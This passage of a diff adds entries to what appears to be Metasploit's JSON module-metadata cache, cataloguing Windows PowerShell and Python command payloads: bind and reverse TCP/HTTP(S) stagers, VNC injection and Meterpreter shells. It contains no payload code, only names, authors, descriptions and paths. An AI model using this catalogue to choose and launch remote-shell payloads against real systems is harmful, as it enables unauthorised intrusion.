"cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/shell_bind_tcp", + "staged": false + }, + "payload_cmd/windows/powershell/x64/shell_reverse_tcp": { + "name": "Powershell Exec, Windows x64 Command Shell, Reverse TCP Inline", + "fullname": "payload/cmd/windows/powershell/x64/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf " + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to attacker and spawn a command shell (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/shell_reverse_tcp", + "staged": false + }, + "payload_cmd/windows/powershell/x64/vncinject/bind_ipv6_tcp": { + "name": "Powershell Exec, Windows x64 IPv6 Bind TCP Stager", + "fullname": "payload/cmd/windows/powershell/x64/vncinject/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf " + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for an IPv6 connection (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 
+0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/vncinject/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/vncinject/bind_ipv6_tcp", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/bind_ipv6_tcp" + }, + "payload_cmd/windows/powershell/x64/vncinject/bind_ipv6_tcp_uuid": { + "name": "Powershell Exec, Windows x64 IPv6 Bind TCP Stager with UUID Support", + "fullname": "payload/cmd/windows/powershell/x64/vncinject/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "OJ Reeves" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for an IPv6 connection with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/vncinject/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/vncinject/bind_ipv6_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" + }, + 
"payload_cmd/windows/powershell/x64/vncinject/bind_named_pipe": { + "name": "Powershell Exec, Windows x64 Bind Named Pipe Stager", + "fullname": "payload/cmd/windows/powershell/x64/vncinject/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "UserExistsError" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for a pipe connection (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/vncinject/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/vncinject/bind_named_pipe", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/bind_named_pipe" + }, + "payload_cmd/windows/powershell/x64/vncinject/bind_tcp": { + "name": "Powershell Exec, Windows x64 Bind TCP Stager", + "fullname": "payload/cmd/windows/powershell/x64/vncinject/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf " + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for a connection (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + 
"autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/vncinject/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/vncinject/bind_tcp", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/bind_tcp" + }, + "payload_cmd/windows/powershell/x64/vncinject/bind_tcp_rc4": { + "name": "Powershell Exec, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/powershell/x64/vncinject/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm ", + "skape ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/vncinject/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/vncinject/bind_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/vncinject", + 
"stager_refname": "windows/x64/bind_tcp_rc4" + }, + "payload_cmd/windows/powershell/x64/vncinject/bind_tcp_uuid": { + "name": "Powershell Exec, Bind TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/powershell/x64/vncinject/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "OJ Reeves" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for a connection with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/vncinject/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/vncinject/bind_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/bind_tcp_uuid" + }, + "payload_cmd/windows/powershell/x64/vncinject/reverse_http": { + "name": "Powershell Exec, Windows x64 Reverse HTTP Stager (wininet)", + "fullname": "payload/cmd/windows/powershell/x64/vncinject/reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "OJ Reeves" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nTunnel communication over HTTP (Windows x64 wininet)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + 
"URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/vncinject/reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/vncinject/reverse_http", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/reverse_http" + }, + "payload_cmd/windows/powershell/x64/vncinject/reverse_https": { + "name": "Powershell Exec, Windows x64 Reverse HTTP Stager (wininet)", + "fullname": "payload/cmd/windows/powershell/x64/vncinject/reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm ", + "agix", + "rwincey" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nTunnel communication over HTTP (Windows x64 wininet)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/vncinject/reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + 
"adapted_refname": "windows/x64/vncinject/reverse_https", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/reverse_https" + }, + "payload_cmd/windows/powershell/x64/vncinject/reverse_tcp": { + "name": "Powershell Exec, Windows x64 Reverse TCP Stager", + "fullname": "payload/cmd/windows/powershell/x64/vncinject/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf " + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/vncinject/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/vncinject/reverse_tcp", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/reverse_tcp" + }, + "payload_cmd/windows/powershell/x64/vncinject/reverse_tcp_rc4": { + "name": "Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/powershell/x64/vncinject/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm ", + "skape ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the 
attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/vncinject/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/vncinject/reverse_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/reverse_tcp_rc4" + }, + "payload_cmd/windows/powershell/x64/vncinject/reverse_tcp_uuid": { + "name": "Powershell Exec, Reverse TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/powershell/x64/vncinject/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "OJ Reeves" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/vncinject/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": 
false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/vncinject/reverse_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/reverse_tcp_uuid" + }, + "payload_cmd/windows/powershell/x64/vncinject/reverse_winhttp": { + "name": "Powershell Exec, Windows x64 Reverse HTTP Stager (winhttp)", + "fullname": "payload/cmd/windows/powershell/x64/vncinject/reverse_winhttp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "OJ Reeves" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nTunnel communication over HTTP (Windows x64 winhttp)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/vncinject/reverse_winhttp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/vncinject/reverse_winhttp", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/reverse_winhttp" + }, + "payload_cmd/windows/powershell/x64/vncinject/reverse_winhttps": { + "name": "Powershell Exec, Windows x64 Reverse HTTPS Stager (winhttp)", + "fullname": "payload/cmd/windows/powershell/x64/vncinject/reverse_winhttps", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + 
"sf ", + "OJ Reeves" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nTunnel communication over HTTPS (Windows x64 winhttp)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/vncinject/reverse_winhttps", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/vncinject/reverse_winhttps", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/reverse_winhttps" + }, + "payload_cmd/windows/powershell_bind_tcp": { + "name": "Windows Interactive Powershell Session, Bind TCP", + "fullname": "payload/cmd/windows/powershell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Ben Turner", + "Dave Hardy" + ], + "description": "Interacts with a powershell session on an established socket connection", + "references": [ + "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/windows/powershell_bind_tcp.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": 
false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/windows/powershell_reverse_tcp": { + "name": "Windows Interactive Powershell Session, Reverse TCP", + "fullname": "payload/cmd/windows/powershell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Ben Turner", + "Dave Hardy" + ], + "description": "Interacts with a powershell session on an established socket connection", + "references": [ + "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-11-04 00:33:03 +0000", + "path": "/modules/payloads/singles/cmd/windows/powershell_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/windows/powershell_reverse_tcp_ssl": { + "name": "Windows Interactive Powershell Session, Reverse TCP SSL", + "fullname": "payload/cmd/windows/powershell_reverse_tcp_ssl", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Ben Turner", + "Dave Hardy" + ], + "description": "Interacts with a powershell session on an established SSL socket connection", + "references": [ + "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-11-04 00:33:03 +0000", + "path": "/modules/payloads/singles/cmd/windows/powershell_reverse_tcp_ssl.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell_reverse_tcp_ssl", + "check": false, + "post_auth": false, + 
"default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/windows/python/exec": { + "name": "Python Exec, Python Execute Command", + "fullname": "payload/cmd/windows/python/exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre" + ], + "description": "Execute a Python payload from a command.\n\nExecute an arbitrary OS command. Compatible with Python 2.7 and 3.4+.", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-01-20 14:53:59 +0000", + "path": "/modules/payloads/adapters/cmd/windows/python.rb", + "is_install_path": true, + "ref_name": "cmd/windows/python/exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/python", + "adapted_refname": "python/exec", + "staged": false + }, + "payload_cmd/windows/python/meterpreter/bind_tcp": { + "name": "Python Exec, Python Meterpreter, Python Bind TCP Stager", + "fullname": "payload/cmd/windows/python/meterpreter/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre" + ], + "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nListen for a connection", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-01-20 14:53:59 +0000", + "path": "/modules/payloads/adapters/cmd/windows/python.rb", + "is_install_path": true, + "ref_name": "cmd/windows/python/meterpreter/bind_tcp", + "check": false, + "post_auth": false, + 
"default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/python", + "adapted_refname": "python/meterpreter/bind_tcp", + "staged": true, + "stage_refname": "python/meterpreter", + "stager_refname": "python/bind_tcp" + }, + "payload_cmd/windows/python/meterpreter/bind_tcp_uuid": { + "name": "Python Exec, Python Meterpreter, Python Bind TCP Stager with UUID Support", + "fullname": "payload/cmd/windows/python/meterpreter/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "OJ Reeves" + ], + "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nListen for a connection with UUID Support", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-01-20 14:53:59 +0000", + "path": "/modules/payloads/adapters/cmd/windows/python.rb", + "is_install_path": true, + "ref_name": "cmd/windows/python/meterpreter/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/python", + "adapted_refname": "python/meterpreter/bind_tcp_uuid", + "staged": true, + "stage_refname": "python/meterpreter", + "stager_refname": "python/bind_tcp_uuid" + }, + "payload_cmd/windows/python/meterpreter/reverse_http": { + "name": "Python Exec, Python Meterpreter, Python Reverse HTTP Stager", + "fullname": "payload/cmd/windows/python/meterpreter/reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre" + ], + "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 
2.5-2.7 & 3.1+).\n\nTunnel communication over HTTP", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-01-20 14:53:59 +0000", + "path": "/modules/payloads/adapters/cmd/windows/python.rb", + "is_install_path": true, + "ref_name": "cmd/windows/python/meterpreter/reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/python", + "adapted_refname": "python/meterpreter/reverse_http", + "staged": true, + "stage_refname": "python/meterpreter", + "stager_refname": "python/reverse_http" + }, + "payload_cmd/windows/python/meterpreter/reverse_https": { + "name": "Python Exec, Python Meterpreter, Python Reverse HTTPS Stager", + "fullname": "payload/cmd/windows/python/meterpreter/reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre" + ], + "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nTunnel communication over HTTP using SSL", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-01-20 14:53:59 +0000", + "path": "/modules/payloads/adapters/cmd/windows/python.rb", + "is_install_path": true, + "ref_name": "cmd/windows/python/meterpreter/reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/python", + "adapted_refname": "python/meterpreter/reverse_https", + "staged": true, + "stage_refname": "python/meterpreter", + "stager_refname": "python/reverse_https" + }, + 
"payload_cmd/windows/python/meterpreter/reverse_tcp": { + "name": "Python Exec, Python Meterpreter, Python Reverse TCP Stager", + "fullname": "payload/cmd/windows/python/meterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre" + ], + "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-01-20 14:53:59 +0000", + "path": "/modules/payloads/adapters/cmd/windows/python.rb", + "is_install_path": true, + "ref_name": "cmd/windows/python/meterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/python", + "adapted_refname": "python/meterpreter/reverse_tcp", + "staged": true, + "stage_refname": "python/meterpreter", + "stager_refname": "python/reverse_tcp" + }, + "payload_cmd/windows/python/meterpreter/reverse_tcp_ssl": { + "name": "Python Exec, Python Meterpreter, Python Reverse TCP SSL Stager", + "fullname": "payload/cmd/windows/python/meterpreter/reverse_tcp_ssl", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "Ben Campbell ", + "RageLtMan" + ], + "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nReverse Python connect back stager using SSL", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-01-20 14:53:59 +0000", + "path": "/modules/payloads/adapters/cmd/windows/python.rb", 
+ "is_install_path": true, + "ref_name": "cmd/windows/python/meterpreter/reverse_tcp_ssl", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/python", + "adapted_refname": "python/meterpreter/reverse_tcp_ssl", + "staged": true, + "stage_refname": "python/meterpreter", + "stager_refname": "python/reverse_tcp_ssl" + }, + "payload_cmd/windows/python/meterpreter/reverse_tcp_uuid": { + "name": "Python Exec, Python Meterpreter, Python Reverse TCP Stager with UUID Support", + "fullname": "payload/cmd/windows/python/meterpreter/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "OJ Reeves" + ], + "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nConnect back to the attacker with UUID Support", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-01-20 14:53:59 +0000", + "path": "/modules/payloads/adapters/cmd/windows/python.rb", + "is_install_path": true, + "ref_name": "cmd/windows/python/meterpreter/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/python", + "adapted_refname": "python/meterpreter/reverse_tcp_uuid", + "staged": true, + "stage_refname": "python/meterpreter", + "stager_refname": "python/reverse_tcp_uuid" + }, + "payload_cmd/windows/python/meterpreter_bind_tcp": { + "name": "Python Exec, Python Meterpreter Shell, Bind TCP Inline", + "fullname": "payload/cmd/windows/python/meterpreter_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", 
+ "author": [ + "Spencer McIntyre" + ], + "description": "Execute a Python payload from a command.\n\nConnect to the victim and spawn a Meterpreter shell", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-01-20 14:53:59 +0000", + "path": "/modules/payloads/adapters/cmd/windows/python.rb", + "is_install_path": true, + "ref_name": "cmd/windows/python/meterpreter_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/python", + "adapted_refname": "python/meterpreter_bind_tcp", + "staged": false + }, + "payload_cmd/windows/python/meterpreter_reverse_http": { + "name": "Python Exec, Python Meterpreter Shell, Reverse HTTP Inline", + "fullname": "payload/cmd/windows/python/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + 